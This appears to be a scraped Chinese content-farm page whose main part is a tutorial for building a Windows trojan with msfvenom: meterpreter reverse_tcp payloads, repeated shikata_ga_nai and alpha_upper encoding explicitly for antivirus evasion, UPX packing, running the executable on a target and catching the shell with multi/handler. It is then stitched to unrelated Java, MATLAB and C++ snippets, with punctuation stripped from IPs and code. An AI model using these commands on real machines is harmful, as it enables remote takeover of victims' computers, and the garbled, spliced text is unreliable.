如何用msfvenom生成木马程序

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

结果:

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是1921681113,端口设置成443所以最后连接会通向1921681113的443端口

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=1921681113 LPORT=443 -f exe > abcexe

注:如果只是用msfpayload生成,简单示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=1921681113 X > Desktop/abcexe

多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192168128129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acnexe

upx加壳：upx -5 /root/Desktop/acnexe

结果:

说明: -p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

4,把生成的abcexe放到win7下执行

5,在命令行下,打开msfconsole

命令: root # msfconsole

6,本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

结果:

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来

8,验证

classVehicle{privateintwheels；privatefloatweight；protectedVehicle(intwheels，floatweight){this。wheels=wheels；this。weight=weight。是普通的除号，即10/2=5。

编写java程序的注意事项：

大小写敏感：Java是大小写敏感的，这就意味着标识符Hello与hello是不同的。

类名：对于所有的类来说，类名的首字母应该大写。如果类名由若干单词组成，那么每个单词的首字母应该大写，例如 MyFirstJavaClass。

方法名：所有的方法名都应该以小写字母开头。如果方法名含有若干单词，则后面的每个单词首字母大写，例如myFirstJavaClass。

IPA是Apple程序应用文件iPhoneApplication的缩写,ipa 文件实质是一个 zip压缩包（不是 rar 或 7z 包），包含 3 个组件：payload 目录下的 app 目录，这个是软件的主程序；iTunesArtwork

1msfpayload生成后门程序：

msfpayload windows/meterpreter/reverse_tcp LHOST=1921680149 x >steupexe

2进入所在目录，修改属性：选择“允许以程序执行文件”,这时候也可以做一些免杀。

3打开msfconsole，加载exploit/multi/handler模块，设置本地主机；然后开始监听：exploit -z -j ：

4将程序拷贝到目标主机并执行：

5后门程序反向连接到msf，msf发起第二次攻击（开始渗透），然后客户端（后门程序）连接到服务端（msf）：

HEX 文件是16进制文件，包含的校验位在里边，程序烧写更可靠，但是文件所占空间更大

BIN 文件是2进制文件，纯粹的2进制数据，这是直接给单片机“看”的，没有多余的单片机不需要的数据在里面~

都是烧写程序的文件

Payload给定：就是Payload是固定某值，就是常数。具体是多少，可能需要查找相关信息。 楼上的哥们的程序很好。matlab中数值相除用 / ，就是‘点除’，然后‘/’除号是指矩阵相除。 下面是程序，已经运行过的，将Payload设为1： Payload =1; N=100;

先帮你做2个吧！有时间再全做出来。 //1、购物打折// #include<iostream> using namespace std; int main() { float sum; cout<<"请输入购物歀："; cin>>sum; if(sum<=1000) cout<<sum<<endl; else if(sum>1000 && sum<=2000) cout<<sum095<<endl; else if(sum>2000 && sum<=3000) cout<<sum09<<endl; else if(sum>3000 && sum<=5000) cout<<sum085<<endl; else if(sum>5000) cout<<sum08<<endl; return 0; } //2、用类实现简单的四则运算// #include<iostream> using namespace std; class Calculator { public: void Input(); void Output(); private: float m1; float m2; float sum; char ch; }; void Calculator::Input() { cin>>m1; cin>>ch; cin>>m2; } void Calculator::Output() { switch(ch) { case '+':sum=m1+m2;break; case '-':sum=m1-m2;break; case '':sum=m1m2;break; case '/':sum=m1/m2;break; } cout<<sum<<endl; } int main() { while(1) { Calculator A; AInput(); AOutput(); } return 0; }phmdkvhcmg7383511308

以上就是关于如何用msfvenom生成木马程序全部的内容，包括:如何用msfvenom生成木马程序、1． 编写一个Java应用程序，设计一个汽车类Vehicle，包含的成员属性有：车轮个数wheels和车重weight。、如何手动注入Payload后门到安卓APK文件并维持访问等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！